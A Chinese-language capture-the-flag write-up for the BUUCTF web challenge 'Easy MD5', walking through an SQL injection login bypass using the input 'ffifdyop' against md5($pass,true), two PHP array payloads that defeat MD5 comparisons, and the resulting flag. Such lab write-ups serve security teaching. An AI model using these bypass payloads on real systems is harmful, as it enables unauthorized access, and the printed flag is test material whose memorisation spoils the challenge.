BUUCTF – Web – Easy MD5

admin 安全

题目就是一个很普通的表单,F12也看不到什么
在这里插入图片描述
随便填个数据抓包看一下
在这里插入图片描述

select * from 'admin' where password=md5($pass,true)

看来突破点是md5($pass, true)
md5($pass)的意思是计算$pass的MD5的值并返回十六进制格式,如果设置为true,将以二进制的形式返回,这里存在一个漏洞

$pass = ffifdyop的时候,md5($pass,true) => 'or'6xxxxx

<?php

$a = 'ffifdyop';
echo md5($a);
echo "n";
echo md5($a, true);

?>

输出结果:
在这里插入图片描述
这样会导致原本的查询语言会变成:

select * from 'admin' where password= ''or 1	//永真

输入ffifdyop,登录成功
跳到这个页面
在这里插入图片描述
查看源代码:

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

payload:?a[]=1&b[]=2

到达以下页面:

<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

payload:param1[]=1&param2[]=2
在这里插入图片描述
得到:flag{15332b95-2169-45b1-913a-063da23053ad}

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码
< <上一篇
下一篇>>